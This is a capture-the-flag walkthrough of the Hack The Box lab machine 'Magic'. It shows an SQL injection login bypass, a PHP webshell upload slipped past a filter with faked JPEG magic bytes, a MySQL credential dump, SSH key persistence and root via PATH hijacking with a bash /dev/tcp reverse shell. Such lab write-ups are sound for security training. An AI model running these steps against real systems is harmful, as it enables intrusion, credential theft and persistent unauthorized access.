Magic HTB

IP

10.10.10.185

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.185 | cut -d"/" -f1 | tr '\n' ','

Ports open

22,80

Lets run a more in-depth scan of the targets ports

sudo nmap -sCV -p22,80 -oA tcp_ports 10.10.10.185

results

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

what can we see

• SSH is open

• we have a HTTP web server Apache 2.4.29

• ubuntu server

Let's check out the web server

Looks like

• we have the ability to login in, but cant create an account

• the ability to upload images

• we can see GIFS and JPEG

Given the name of the box Magic could this be a reference to magic bytes, can we upload a reversehsell and bypass any restrictions using magic bytes? maybe

for good measures Lets run feroxbuster and create and account

feroxbuster

feroxbuster -u http://10.10.10.185 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs_http.txt

results

301      GET        9l       28w      313c http://10.10.10.185/images => http://10.10.10.185/images/
200      GET        2l      119w    12085c http://10.10.10.185/assets/js/jquery.poptrox.min.js
200      GET        2l       87w     2439c http://10.10.10.185/assets/js/breakpoints.min.js
200      GET      118l      277w     4221c http://10.10.10.185/login.php
200      GET      151l      677w    68311c http://10.10.10.185/images/uploads/magic-hat_23-2147512156.jpg
200      GET      835l     1757w    16922c http://10.10.10.185/assets/css/main.css
200      GET       88l      506w    34251c http://10.10.10.185/images/fulls/2.jpg
200      GET      209l      457w    32922c http://10.10.10.185/images/fulls/1.jpg
200      GET        2l     1276w    88145c http://10.10.10.185/assets/js/jquery.min.js
301      GET        9l       28w      313c http://10.10.10.185/assets => http://10.10.10.185/assets/
200      GET    23059l   117663w  9521972c http://10.10.10.185/images/uploads/7.jpg
200      GET       60l      207w     4051c http://10.10.10.185/
301      GET        9l       28w      317c http://10.10.10.185/assets/css => http://10.10.10.185/assets/css/
301      GET        9l       28w      316c http://10.10.10.185/assets/js => http://10.10.10.185/assets/js/
301      GET        9l       28w      321c http://10.10.10.185/images/uploads => http://10.10.10.185/images/uploads/
301      GET        9l       28w      324c http://10.10.10.185/assets/css/images => http://10.10.10.185/assets/css/images/
301      GET        9l       28w      327c http://10.10.10.185/assets/css/images/ie => http://10.10.10.185/assets/css/images/ie/
301      GET        9l       28w      313c http://10.10.10.185/images => http://10.10.10.185/images/
200      GET      587l     1232w    12433c http://10.10.10.185/assets/js/util.js
200      GET       16l       41w      280c http://10.10.10.185/assets/css/noscript.css
200      GET      390l      896w     8862c http://10.10.10.185/assets/js/main.js
200      GET        2l       87w     2439c http://10.10.10.185/assets/js/breakpoints.min.js
200      GET        2l       51w     1851c http://10.10.10.185/assets/js/browser.min.js
200      GET        2l      119w    12085c http://10.10.10.185/assets/js/jquery.poptrox.min.js
200      GET      118l      277w     4221c http://10.10.10.185/login.php
200      GET       60l      207w     4053c http://10.10.10.185/index.php
200      GET      209l      457w    32922c http://10.10.10.185/images/fulls/1.jpg
200      GET       88l      506w    34251c http://10.10.10.185/images/fulls/2.jpg
200      GET      835l     1757w    16922c http://10.10.10.185/assets/css/main.css
200      GET      151l      677w    68311c http://10.10.10.185/images/uploads/magic-hat_23-2147512156.jpg
200      GET      192l     1093w    88071c http://10.10.10.185/images/fulls/5.jpeg
200      GET      255l     1421w   121103c http://10.10.10.185/images/uploads/magic-wand.jpg
200      GET      296l     2079w   173684c http://10.10.10.185/images/uploads/magic-1424x900.jpg
200      GET        2l     1276w    88145c http://10.10.10.185/assets/js/jquery.min.js
301      GET        9l       28w      321c http://10.10.10.185/images/uploads => http://10.10.10.185/images/uploads/
200      GET      490l     2867w   223637c http://10.10.10.185/images/uploads/logo.png
301      GET        9l       28w      313c http://10.10.10.185/assets => http://10.10.10.185/assets/
200      GET       27l       59w      782c http://10.10.10.185/assets/js/upload.js
200      GET      108l      217w     2136c http://10.10.10.185/assets/css/upload.css
200      GET     3315l     6597w   390337c http://10.10.10.185/images/fulls/6.jpg
200      GET     1118l     7764w   656671c http://10.10.10.185/images/uploads/trx.jpg
200      GET     6721l    34616w  2627822c http://10.10.10.185/images/fulls/3.jpg
302      GET        0l        0w        0c http://10.10.10.185/logout.php => index.php
200      GET     8189l    47626w  2547702c http://10.10.10.185/images/uploads/giphy.gif
200      GET    23059l   117663w  9521972c http://10.10.10.185/images/uploads/7.jpg
200      GET       60l      207w     4052c http://10.10.10.185/
302      GET       84l      177w     2957c http://10.10.10.185/upload.php => login.php
301      GET        9l       28w      316c http://10.10.10.185/assets/js => http://10.10.10.185/assets/js/
301      GET        9l       28w      317c http://10.10.10.185/assets/css => http://10.10.10.185/assets/css/
301      GET        9l       28w      324c http://10.10.10.185/assets/css/images => http://10.10.10.185/assets/css/images/
301      GET        9l       28w      327c http://10.10.10.185/assets/css/images/ie => http://10.10.10.185/assets/css/images/ie/
301      GET        9l       28w      318c http://10.10.10.185/assets/sass => http://10.10.10.185/assets/sass/
301      GET        9l       28w      323c http://10.10.10.185/assets/sass/libs => http://10.10.10.185/assets/sass/libs/

/login.php

we can see the following

Let's catch the request with burp and see if we can bypass auth

• we do find SQLi injection that allows us to bypass authentication

this is what our request looks like

the query would look something like

SELECT * from users where username = '' or 1=1 -- -and password = 'admin';

• as you can see we 1=1 condition always evals to True by passing the need for a valid username, and the -- - indicates a comment in SQL so everything after this is ignored (the password)

/upload.php

we are bought to /upload.php where we have the ability to upload a image to the server,

Let's consider a few things

• php runs on the server, so we would want to run a php reverse-shell (pentest monkeys)

• name of the box being magic, good indication that we will have to add a magic byte to the file so the server things we are sending a jpeg (could do this in burp)

1. Lets set up our payload and shell

• we will use pentest monkeys reverse-shell

p /usr/share/webshells/php/php-reverse-shell.php ./

Lets change the call back IP and port

set up our listner

rlwrap -cAr nc -lvnp 9001

1. we need to edit the hex value of our file, we can use a tool like hexedit , we need to edit the first 4 bytes and replace them with that of a jpeg file

here is a list of 'file magic numbers'

https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5

from this list we can see the magic byte in hex is

Now we need to replace the first 4 bytes in a php reverse-shell to match of those above

hexeditor php-reverse-shell.php

Now we can edit the magic byte

our file is ready to be uploaded (we'll almost)

1. While uploading our file lets catch the request with burp

Notice we added a .jpeg file extension, this should breeze past the restriction

1. Now we just need to execute our reverse-shell, in the url bar

http://10.10.10.185/images/uploads/php-reverse-shell.php.jpeg

• hmmm that did not go to plan

• we bypassed the filters, but our php file is being treated as an image, we have no functionality

Lets try a simple cmd php webshell

same as before

1. copy into our working directory

cp /usr/share/webshells/php/simple-backdoor.php ./

1. edit the magic byte with hexeditor

2. upload and catch with burp

3. head over to

http://10.10.10.185/images/uploads/cmd.php.jpeg

we can see the following

Lets see if we can get any system commands

http://10.10.10.185/images/uploads/cmd.php.jpeg?cmd=whoami

• we can send commands to the target server

awesome from here we can establish a reverse-shell

Now lets establish a connection using bash, within the url bar

we now have a shell on the system

Looking in the /var/www/Magic we can find db.php5 when we cat it out we can see possible credentials

theseus: iamkingtheseus

if we look within the /home directory we can find the user theseus

lets see if we can access the account

# we need pty
python3 -c "import pty;pty.spawn('/bin/bash')"
su theseus

• no luck

Since we found credentials to a database would be goo practice to see if any ports are listening internally

netstat -ano

we can see port 3306 (MySQL) and port 631 (most likely IPP Internet Printing Protocol)

Lets see if we can connect to the mysql database

mysql

• unfortunately the MySQL command is not installed on the machine

lets see if we can find anything related to mysql

locate mysql

• in among the output we do find something interesting

/usr/bin/mysql_config_editor
/usr/bin/mysql_embedded
/usr/bin/mysql_install_db
/usr/bin/mysql_plugin
/usr/bin/mysql_secure_installation
/usr/bin/mysql_ssl_rsa_setup
/usr/bin/mysql_tzinfo_to_sql
/usr/bin/mysql_upgrade
/usr/bin/mysqladmin
/usr/bin/mysqlanalyze
/usr/bin/mysqlbinlog
/usr/bin/mysqlcheck
/usr/bin/mysqld_multi
/usr/bin/mysqld_safe
/usr/bin/mysqldump
/usr/bin/mysqldumpslow
/usr/bin/mysqlimport
/usr/bin/mysqloptimize
/usr/bin/mysqlpump
/usr/bin/mysqlrepair
/usr/bin/mysqlreport
/usr/bin/mysqlshow
/usr/bin/mysqlslap

• Looks like we have found some MySQL tools we can utilize more notably the /usr/bin/mysqldump

Lets see if we can dump the database

mysqldump -u theseus -p --all-databases

results

-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: 
-- ------------------------------------------------------
-- Server version       5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `Magic`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;

USE `Magic`;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2024-01-09  1:36:15

• Looks like we may have found some valid credentials

admin: Th3s3usW4sK1ng

since we have not found a admin user safe to say this could be user theseus password

su theseus

• which it is

Lets check for sudo privileges

sudo -l

• we cant run sudo on the machine

Lets get some persistence on the machine via SSH

1. Lets generate our ssh keys (local machine)

mkdir .ssh
ssh-keygen

1. lets create a authorized_keys file on the targets .ssh directory, and copy our public key over

touch authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCSlmBUVzNP7JWZkjJvtj5UFJOPCXXW7aW8BUfouwewcOl1TTzzd75qOMDIxOO/ndUjIm0rSn2Wc6nBsdBU5wT5ImNyoPPzlrwdGMKuhZDylufYLh+Q37dSma6IbWDV2U6NXQ3lNc0L2qLsxAfeZuhdlMaAWn/2NfReJS2re2axTwfNA9w0TECEZ7lIQtcxNjEKqMWwiE7QIu3EmbXd6b9jXQ9XjnGp7JheYXuzjWUyQXxAj61wK6LqBBpAYdIUcxKkMAVNEouzBoU7ZuvcuLlcGe+niVl7qoGyShEXsrKunlJcju2yigGqEEfCjvLjaKP8Q+EeGYMkjgjiJsn7m1fkHkQ4XAlhJp35fNtvqjaL6VIWME29OL0v2N1n1ZzMkzmMwVRX4GYW7hz+d/R8/rvnPyL/1Te8j9Xqs5NcLo9JHqXJPiv5uclKNA0h8HTVSO/er5dayO9CgEqRi6OiNalxo1oTycFOe5A4sYDKW9jJVsa1GjgT983Z3iOcVixTX7c=" > authorized_keys

1. Now lets give our private key the appropriate permissions and see if we can log in via SSH

chmod 600 id-rsa
ssh -i id-rsa theseus@10.10.10.185

we now have access via SSH

When searching for SUID files we can see something interesting

find / -type f -perm /4000 2>/dev/null

we find an odd program

/bin/sysinfo

checking the permission shows

we can see anyone within the users group and execute this program

since we are part of the users group we can execute the command

running the command

/bin/sysinfo

it just output a bunch of system information

but its odd lets run the tool along with ltrace which prints out the calls made outside of the binary

ltrace /bin/sysinfo

looking through the output we can see something interesting

popen is another way to open a process on linux, but the interesting part is that the binary is making a call to fdisk , but its not specifying the full path, which leaves this binary possibly vulnerable to path hijacking

Lets test this theory

1. Let's create a reverse-shell in the /dev/shm directory and save it in an executable file fdisk

echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.22/9001 0>&1' > fdisk
chmod +x fdisk

1. Lets start a listener and execute the file to see if it attempts a connection back to us

#local machine
rlwrap -cAr nc -lvnp 9001
# target machine 
./fdisk

• we can see we have a successful connection back to the target server

1. Now we can update our current path to /dev/shm

export PATH="/dev/shm:$PATH"

1. Now when we run sysinfo, it should execute fdisk where our reverse-shell resides, and we should gain a reverse-shell as root

sysinfo

1. if we look back at our shell we should be root